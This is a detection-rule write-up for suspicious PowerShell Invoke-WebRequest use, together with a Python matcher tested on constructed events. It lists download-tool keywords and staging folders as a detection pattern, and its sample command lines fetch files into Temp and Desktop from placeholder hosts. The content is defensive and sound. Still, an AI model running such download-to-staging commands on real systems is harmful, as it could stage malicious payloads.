
Suspicious Invoke-WebRequest Execution

Summary
This detection rule identifies potentially malicious use of the PowerShell `Invoke-WebRequest` cmdlet, particularly when the downloaded output is written to suspicious directories such as AppData, Desktop, and Temp. Such behavior often indicates an attempt to download a malicious payload or to exfiltrate data. The rule matches the execution of PowerShell scripts or commands whose command line contains one of the keywords 'curl', 'Invoke-WebRequest', 'iwr', or 'wget' together with request and output flags (e.g., '-ur', '-o'). The presence of specific folder paths in the command line (e.g., `%AppData%`, `%Public%`, `%Temp%`, and others) further raises the suspicion that the command is being used for unauthorized purposes. Because the rule targets Windows process creation events, it surfaces high-risk commands that commonly align with command-and-control activity.
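The following is an added example, not the Sigma project's rule file, that mirrors the three-part condition the summary describes (download keyword, request/output flag, suspicious folder) and runs it over a few constructed Windows process-creation events. The keyword, flag and folder lists are only the ones named on this page; the real rule's lists are longer, so treat them as illustrative. Sigma `contains` modifiers are case-insensitive substring tests, which the matcher reproduces, and the comments point out the false-positive exposure of short tokens such as `-o`.

```python
"""Added example, not the Sigma project's own rule: a small matcher that
mirrors the condition the summary describes (download keyword + request/
output flag + suspicious folder) over constructed process-creation events."""

# Token lists are the ones named on the page; the real rule's lists are
# longer ("and others"), so these are illustrative, not the rule's source.
DOWNLOAD_KEYWORDS = ("curl", "invoke-webrequest", "iwr", "wget")
REQUEST_OUTPUT_FLAGS = ("-ur", "-o")
SUSPICIOUS_FOLDERS = (
    "%appdata%", "%public%", "%temp%",         # environment-variable forms
    "\\appdata\\", "\\desktop\\", "\\temp\\",  # expanded path forms
)


def is_suspicious_webrequest(command_line: str) -> bool:
    """Return True when all three parts of the condition appear.

    Sigma 'contains' modifiers are case-insensitive substring tests, so the
    command line is lower-cased once and each list is checked with `in`.
    Short tokens are broad on purpose: '-ur' also matches '-Uri' and '-o'
    also matches '-OutFile', '-Out', '-Object'; the folder requirement is
    what keeps the rule narrow enough to be useful.
    """
    cl = command_line.lower()
    has_keyword = any(k in cl for k in DOWNLOAD_KEYWORDS)
    has_flag = any(f in cl for f in REQUEST_OUTPUT_FLAGS)
    has_folder = any(p in cl for p in SUSPICIOUS_FOLDERS)
    return has_keyword and has_flag and has_folder


def scan(events):
    """Return the CommandLine of every process-creation event that matches."""
    return [e["CommandLine"] for e in events
            if is_suspicious_webrequest(e["CommandLine"])]


# Constructed events (not real telemetry); hostnames use the reserved
# .invalid TLD so nothing here refers to a real server.
CONSTRUCTED_EVENTS = [
    # 1: alias 'iwr', -Uri plus -OutFile into %Temp% -> should match
    {"EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe iwr -Uri http://example.invalid/a.bin "
                    "-OutFile %Temp%\\a.bin"},
    # 2: same cmdlet writing under Program Files -> no suspicious folder, no match
    {"EventID": 1,
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest -Uri https://example.invalid/pkg.zip "
                    "-OutFile 'C:\\Program Files\\Tool\\pkg.zip'"},
    # 3: Invoke-WebRequest with a bare URL and no flags at all -> no match
    {"EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://example.invalid/status"},
    # 4: 'curl' alias writing to the Desktop with -o -> should match
    {"EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell curl http://example.invalid/x.ps1 "
                    "-o C:\\Users\\alice\\Desktop\\x.ps1"},
]

if __name__ == "__main__":
    for hit in scan(CONSTRUCTED_EVENTS):
        print("MATCH:", hit)
```

Events 1 and 4 match; event 2 fails only on the folder test, which is the part of the condition that separates an ordinary software download from a write into a user-writable staging directory, and event 3 fails on the flag test.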
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2022-08-02